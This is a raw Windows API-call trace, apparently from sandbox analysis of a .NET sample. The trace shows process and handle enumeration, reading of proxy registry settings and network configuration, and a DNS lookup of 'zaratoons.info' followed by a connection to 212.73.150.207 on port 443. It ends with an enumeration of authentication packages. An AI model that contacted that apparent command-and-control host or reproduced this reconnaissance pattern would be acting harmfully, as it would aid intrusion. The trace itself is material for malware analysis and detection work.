	[0727.324] CreateMutexW (lpMutexAttributes=0x30ba320, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0727.328] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0727.328] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30ba638, cbSid=0x1c7dd170 | out: pSid=0x30ba638*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd170) returned 1
	[0727.328] CreateMutexW (lpMutexAttributes=0x30ba7f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0727.329] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0727.330] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0727.331] ReleaseMutex (hMutex=0x3ec) returned 1
	[0727.331] CloseHandle (hObject=0x3ec) returned 1
	[0727.332] GetCurrentProcessId () returned 0xf54
	[0727.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x3ec
	[0727.334] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c7dd180, lpExitTime=0x1c7dd178, lpKernelTime=0x1c7dd170, lpUserTime=0x1c7dd168 | out: lpCreationTime=0x1c7dd180, lpExitTime=0x1c7dd178, lpKernelTime=0x1c7dd170, lpUserTime=0x1c7dd168) returned 1
	[0727.334] CloseHandle (hObject=0x3ec) returned 1
	[0731.659] ReleaseMutex (hMutex=0x3e0) returned 1
	[0731.659] CloseHandle (hObject=0x3e0) returned 1
	[0733.313] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30bb658, cbSid=0x1c7dd210 | out: pSid=0x30bb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd210) returned 1
	[0733.313] CreateMutexW (lpMutexAttributes=0x30bb810, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0733.313] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0733.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x3ec
	[0733.314] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c7dd1b0, lpExitTime=0x1c7dd1a8, lpKernelTime=0x1c7dd1a0, lpUserTime=0x1c7dd198 | out: lpCreationTime=0x1c7dd1b0, lpExitTime=0x1c7dd1a8, lpKernelTime=0x1c7dd1a0, lpUserTime=0x1c7dd198) returned 1
	[0733.314] CloseHandle (hObject=0x3ec) returned 1
	[0733.314] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x3ec
	[0733.316] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.316] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.317] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd108*=0x3f0) returned 1
	[0733.318] CloseHandle (hObject=0x3f0) returned 1
	[0733.318] CloseHandle (hObject=0x3ec) returned 1
	[0733.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x3ec
	[0733.318] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c7dd1b0, lpExitTime=0x1c7dd1a8, lpKernelTime=0x1c7dd1a0, lpUserTime=0x1c7dd198 | out: lpCreationTime=0x1c7dd1b0, lpExitTime=0x1c7dd1a8, lpKernelTime=0x1c7dd1a0, lpUserTime=0x1c7dd198) returned 1
	[0733.318] CloseHandle (hObject=0x3ec) returned 1
	[0733.318] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x3ec
	[0733.319] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.319] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.319] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd108*=0x3f0) returned 1
	[0733.319] CloseHandle (hObject=0x3f0) returned 1
	[0733.319] CloseHandle (hObject=0x3ec) returned 1
	[0733.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3ec
	[0733.319] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c7dd1b0, lpExitTime=0x1c7dd1a8, lpKernelTime=0x1c7dd1a0, lpUserTime=0x1c7dd198 | out: lpCreationTime=0x1c7dd1b0, lpExitTime=0x1c7dd1a8, lpKernelTime=0x1c7dd1a0, lpUserTime=0x1c7dd198) returned 1
	[0733.319] CloseHandle (hObject=0x3ec) returned 1
	[0733.319] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x3ec
	[0733.320] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.320] GetCurrentProcess () returned 0xffffffffffffffff
	[0733.320] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd108*=0x3f0) returned 1
	[0733.320] CloseHandle (hObject=0x3f0) returned 1
	[0733.320] CloseHandle (hObject=0x3ec) returned 1
	[0733.321] ReleaseMutex (hMutex=0x3e0) returned 1
	[0733.321] CloseHandle (hObject=0x3e0) returned 1
	[0733.321] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30bc648, cbSid=0x1c7dd210 | out: pSid=0x30bc648*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd210) returned 1
	[0733.321] CreateMutexW (lpMutexAttributes=0x30bc800, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0733.321] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0733.338] ReleaseMutex (hMutex=0x3e0) returned 1
	[0733.338] CloseHandle (hObject=0x3e0) returned 1
	[0733.338] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30bd480, cbSid=0x1c7dd210 | out: pSid=0x30bd480*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd210) returned 1
	[0733.339] CreateMutexW (lpMutexAttributes=0x30bd638, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0733.339] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0733.340] ReleaseMutex (hMutex=0x3e0) returned 1
	[0733.340] CloseHandle (hObject=0x3e0) returned 1
	[0733.340] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30be2b0, cbSid=0x1c7dd210 | out: pSid=0x30be2b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd210) returned 1
	[0733.340] CreateMutexW (lpMutexAttributes=0x30be468, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0733.340] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0733.341] ReleaseMutex (hMutex=0x3e0) returned 1
	[0733.341] CloseHandle (hObject=0x3e0) returned 1
	[0734.616] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30bf0e0, cbSid=0x1c7dd1c0 | out: pSid=0x30bf0e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1c0) returned 1
	[0734.617] CreateMutexW (lpMutexAttributes=0x30bf298, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0734.617] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0734.617] ReleaseMutex (hMutex=0x3e0) returned 1
	[0734.618] CloseHandle (hObject=0x3e0) returned 1
	[0734.618] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30bff00, cbSid=0x1c7dd1c0 | out: pSid=0x30bff00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1c0) returned 1
	[0734.618] CreateMutexW (lpMutexAttributes=0x30c00b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0734.618] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0734.619] ReleaseMutex (hMutex=0x3e0) returned 1
	[0734.619] CloseHandle (hObject=0x3e0) returned 1
	[0734.619] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30c0d18, cbSid=0x1c7dd1c0 | out: pSid=0x30c0d18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1c0) returned 1
	[0734.619] CreateMutexW (lpMutexAttributes=0x30c0ed0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0734.620] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0734.620] ReleaseMutex (hMutex=0x3e0) returned 1
	[0734.620] CloseHandle (hObject=0x3e0) returned 1
	[0734.621] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30c1b40, cbSid=0x1c7dd1c0 | out: pSid=0x30c1b40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1c0) returned 1
	[0734.621] CreateMutexW (lpMutexAttributes=0x30c1cf8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0734.621] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0734.622] ReleaseMutex (hMutex=0x3e0) returned 1
	[0734.622] CloseHandle (hObject=0x3e0) returned 1
	[0734.622] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30c2960, cbSid=0x1c7dd1c0 | out: pSid=0x30c2960*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1c0) returned 1
	[0734.622] CreateMutexW (lpMutexAttributes=0x30c2b18, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3e0
	[0734.623] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1f4) returned 0x0
	[0734.623] ReleaseMutex (hMutex=0x3e0) returned 1
	[0734.623] CloseHandle (hObject=0x3e0) returned 1
	[0737.612] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e0
	[0737.612] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ec
	[0737.613] ioctlsocket (in: s=0x3e0, cmd=-2147195266, argp=0x1c7dd7f8 | out: argp=0x1c7dd7f8) returned 0
	[0737.613] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f0
	[0737.614] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0737.614] ioctlsocket (in: s=0x3f0, cmd=-2147195266, argp=0x1c7dd7f8 | out: argp=0x1c7dd7f8) returned 0
	[0737.614] WSAIoctl (in: s=0x3e0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd770, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd770, lpOverlapped=0x0) returned -1
	[0737.616] CoTaskMemAlloc (cb=0x204) returned 0x1b9b2ff0
	[0737.616] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b9b2ff0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.119] CoTaskMemFree (pv=0x1b9b2ff0) 
	[0739.120] WSAEventSelect (s=0x3e0, hEventObject=0x3ec, lNetworkEvents=512) returned 0
	[0739.120] WSAIoctl (in: s=0x3f0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd770, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd770, lpOverlapped=0x0) returned -1
	[0739.120] CoTaskMemAlloc (cb=0x204) returned 0x1b9b2ff0
	[0739.120] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b9b2ff0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0739.120] CoTaskMemFree (pv=0x1b9b2ff0) 
	[0739.120] WSAEventSelect (s=0x3f0, hEventObject=0x3f4, lNetworkEvents=512) returned 0
	[0739.120] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8
	[0739.121] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x3f8, param_3=0x3) returned 0x0
	[0739.197] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c7dd8b0 | out: phkResult=0x1c7dd8b0*=0x414) returned 0x0
	[0739.199] RegOpenKeyExW (in: hKey=0x414, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd798 | out: phkResult=0x1c7dd798*=0x418) returned 0x0
	[0739.200] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0739.200] RegNotifyChangeKeyValue (hKey=0x418, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x41c, fAsynchronous=1) returned 0x0
	[0739.201] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd7c0 | out: phkResult=0x1c7dd7c0*=0x420) returned 0x0
	[0739.202] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0739.202] RegNotifyChangeKeyValue (hKey=0x420, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x424, fAsynchronous=1) returned 0x0
	[0739.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd7c0 | out: phkResult=0x1c7dd7c0*=0x428) returned 0x0
	[0739.202] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x42c
	[0739.202] RegNotifyChangeKeyValue (hKey=0x428, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x42c, fAsynchronous=1) returned 0x0
	[0739.202] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.202] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd728 | out: TokenHandle=0x1c7dd728*=0x430) returned 1
	[0739.210] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.210] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcef8 | out: TokenHandle=0x1c7dcef8*=0x434) returned 1
	[0739.215] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.215] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcef8 | out: TokenHandle=0x1c7dcef8*=0x438) returned 1
	[0747.584] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c7dd7f8 | out: pProxyConfig=0x1c7dd7f8) returned 1
	[0750.807] SetEvent (hEvent=0x38c) returned 1
	[0756.464] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.464] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcf68 | out: TokenHandle=0x1c7dcf68*=0x488) returned 1
	[0756.468] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.468] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dcf68 | out: TokenHandle=0x1c7dcf68*=0x48c) returned 1
	[0757.854] SetEvent (hEvent=0x38c) returned 1
	[0765.128] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c7dd438 | out: pFixedInfo=0x0, pOutBufLen=0x1c7dd438) returned 0x6f
	[0772.025] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b9b3200
	[0772.025] GetNetworkParams (in: pFixedInfo=0x1b9b3200, pOutBufLen=0x1c7dd438 | out: pFixedInfo=0x1b9b3200, pOutBufLen=0x1c7dd438) returned 0x0
	[0778.763] CoTaskMemAlloc (cb=0xd) returned 0x1b9ad8a0
	[0778.763] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0778.763] CoTaskMemFree (pv=0x1b9ad8a0) 
	[0778.766] LocalFree (hMem=0x1b9b3200) returned 0x0
	[0779.678] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a4
	[0779.679] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e4
	[0779.681] CoTaskMemAlloc (cb=0x10) returned 0x1b9ad8a0
	[0779.683] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c7dd3e0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7dd3d8 | out: ppResult=0x1c7dd3d8*=0x1b9b25a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b9ade20*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0784.282] CoTaskMemFree (pv=0x1b9ad8a0) 
	[0784.283] CoTaskMemFree (pv=0x0) 
	[0784.284] FreeAddrInfoW (pAddrInfo=0x1b9b25a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b9ade20*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0784.285] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b4
	[0784.286] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0784.286] ioctlsocket (in: s=0x4b4, cmd=-2147195266, argp=0x1c7dd3f8 | out: argp=0x1c7dd3f8) returned 0
	[0784.286] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x48c
	[0784.286] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374
	[0784.286] ioctlsocket (in: s=0x48c, cmd=-2147195266, argp=0x1c7dd3f8 | out: argp=0x1c7dd3f8) returned 0
	[0784.286] WSAIoctl (in: s=0x4b4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd370, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd370, lpOverlapped=0x0) returned -1
	[0784.286] CoTaskMemAlloc (cb=0x204) returned 0x1b9ca2e0
	[0784.286] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b9ca2e0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.287] CoTaskMemFree (pv=0x1b9ca2e0) 
	[0784.287] WSAEventSelect (s=0x4b4, hEventObject=0x388, lNetworkEvents=512) returned 0
	[0784.289] WSAIoctl (in: s=0x48c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c7dd370, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c7dd370, lpOverlapped=0x0) returned -1
	[0784.289] CoTaskMemAlloc (cb=0x204) returned 0x1b9ca2e0
	[0784.289] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x1b9ca2e0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.290] CoTaskMemFree (pv=0x1b9ca2e0) 
	[0784.290] WSAEventSelect (s=0x48c, hEventObject=0x374, lNetworkEvents=512) returned 0
	[0784.292] GetAdaptersAddresses () returned 0x6f
	[0785.041] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b9ce2b0
	[0785.041] GetAdaptersAddresses () returned 0x0
	[0787.155] LocalFree (hMem=0x1b9ce2b0) returned 0x0
	[0787.158] WSAConnect (in: s=0x4a4, name=0x30ce4a0*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0787.341] closesocket (s=0x3e4) returned 0
	[0789.274] EnumerateSecurityPackagesW (in: pcPackages=0x1c7dd258, ppPackageInfo=0x1c7dd250 | out: pcPackages=0x1c7dd258, ppPackageInfo=0x1c7dd250) returned 0x0
	[0789.278] lstrlenW (lpString="Negotiate") returned 9
	[0789.279] CoTaskMemAlloc (cb=0x16) returned 0x1b9adde0
	[0789.279] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0b90, Length=0x14 | out: Destination=0x1b9adde0) 
	[0789.279] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.279] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0789.279] CoTaskMemAlloc (cb=0x3c) returned 0x1b9c9470
	[0789.279] RtlMoveMemory (in: Destination=0x1b9c9470, Source=0x2b0ba4, Length=0x3a | out: Destination=0x1b9c9470) 
	[0789.279] CoTaskMemFree (pv=0x1b9c9470) 
	[0789.280] lstrlenW (lpString="NegoExtender") returned 12
	[0789.280] CoTaskMemAlloc (cb=0x1c) returned 0x1b9b60d0
	[0789.280] RtlMoveMemory (in: Destination=0x1b9b60d0, Source=0x2b0bde, Length=0x1a | out: Destination=0x1b9b60d0) 
	[0789.280] CoTaskMemFree (pv=0x1b9b60d0) 
	[0789.280] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0789.280] CoTaskMemAlloc (cb=0x3e) returned 0x1b9c9470
	[0789.280] RtlMoveMemory (in: Destination=0x1b9c9470, Source=0x2b0bf8, Length=0x3c | out: Destination=0x1b9c9470) 
	[0789.280] CoTaskMemFree (pv=0x1b9c9470) 
	[0789.280] lstrlenW (lpString="Kerberos") returned 8
	[0789.280] CoTaskMemAlloc (cb=0x14) returned 0x1b9adde0
	[0789.280] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0c34, Length=0x12 | out: Destination=0x1b9adde0) 
	[0789.280] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.280] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0789.280] CoTaskMemAlloc (cb=0x32) returned 0x1b9b22e0
	[0789.280] RtlMoveMemory (in: Destination=0x1b9b22e0, Source=0x2b0c46, Length=0x30 | out: Destination=0x1b9b22e0) 
	[0789.280] CoTaskMemFree (pv=0x1b9b22e0) 
	[0789.280] lstrlenW (lpString="NTLM") returned 4
	[0789.280] CoTaskMemAlloc (cb=0xc) returned 0x1b9adde0
	[0789.280] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0c76, Length=0xa | out: Destination=0x1b9adde0) 
	[0789.280] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.281] lstrlenW (lpString="NTLM Security Package") returned 21
	[0789.281] CoTaskMemAlloc (cb=0x2e) returned 0x1b9b22e0
	[0789.281] RtlMoveMemory (in: Destination=0x1b9b22e0, Source=0x2b0c80, Length=0x2c | out: Destination=0x1b9b22e0) 
	[0789.281] CoTaskMemFree (pv=0x1b9b22e0) 
	[0789.281] lstrlenW (lpString="Schannel") returned 8
	[0789.281] CoTaskMemAlloc (cb=0x14) returned 0x1b9adde0
	[0789.281] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0cac, Length=0x12 | out: Destination=0x1b9adde0) 
	[0789.281] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.281] lstrlenW (lpString="Schannel Security Package") returned 25
	[0789.281] CoTaskMemAlloc (cb=0x36) returned 0x1b9b22e0
	[0789.281] RtlMoveMemory (in: Destination=0x1b9b22e0, Source=0x2b0cbe, Length=0x34 | out: Destination=0x1b9b22e0) 
	[0789.281] CoTaskMemFree (pv=0x1b9b22e0) 
	[0789.281] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0789.281] CoTaskMemAlloc (cb=0x5c) returned 0x1b987f70
	[0789.281] RtlMoveMemory (in: Destination=0x1b987f70, Source=0x2b0cf2, Length=0x5a | out: Destination=0x1b987f70) 
	[0789.281] CoTaskMemFree (pv=0x1b987f70) 
	[0789.281] lstrlenW (lpString="Schannel Security Package") returned 25
	[0789.281] CoTaskMemAlloc (cb=0x36) returned 0x1b9b22e0
	[0789.281] RtlMoveMemory (in: Destination=0x1b9b22e0, Source=0x2b0d4c, Length=0x34 | out: Destination=0x1b9b22e0) 
	[0789.281] CoTaskMemFree (pv=0x1b9b22e0) 
	[0789.282] lstrlenW (lpString="WDigest") returned 7
	[0789.282] CoTaskMemAlloc (cb=0x12) returned 0x1b9adde0
	[0789.282] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0d80, Length=0x10 | out: Destination=0x1b9adde0) 
	[0789.282] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.282] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0789.282] CoTaskMemAlloc (cb=0x46) returned 0x1b9c9470
	[0789.282] RtlMoveMemory (in: Destination=0x1b9c9470, Source=0x2b0d90, Length=0x44 | out: Destination=0x1b9c9470) 
	[0789.282] CoTaskMemFree (pv=0x1b9c9470) 
	[0789.282] lstrlenW (lpString="TSSSP") returned 5
	[0789.282] CoTaskMemAlloc (cb=0xe) returned 0x1b9adde0
	[0789.282] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0dd4, Length=0xc | out: Destination=0x1b9adde0) 
	[0789.282] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.282] lstrlenW (lpString="TS Service Security Package") returned 27
	[0789.282] CoTaskMemAlloc (cb=0x3a) returned 0x1b9c9470
	[0789.282] RtlMoveMemory (in: Destination=0x1b9c9470, Source=0x2b0de0, Length=0x38 | out: Destination=0x1b9c9470) 
	[0789.282] CoTaskMemFree (pv=0x1b9c9470) 
	[0789.282] lstrlenW (lpString="pku2u") returned 5
	[0789.282] CoTaskMemAlloc (cb=0xe) returned 0x1b9adde0
	[0789.282] RtlMoveMemory (in: Destination=0x1b9adde0, Source=0x2b0e18, Length=0xc | out: Destination=0x1b9adde0) 
	[0789.283] CoTaskMemFree (pv=0x1b9adde0) 
	[0789.283] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0789.283] CoTaskMemAlloc (cb=0x30) returned 0x1b9b22e0
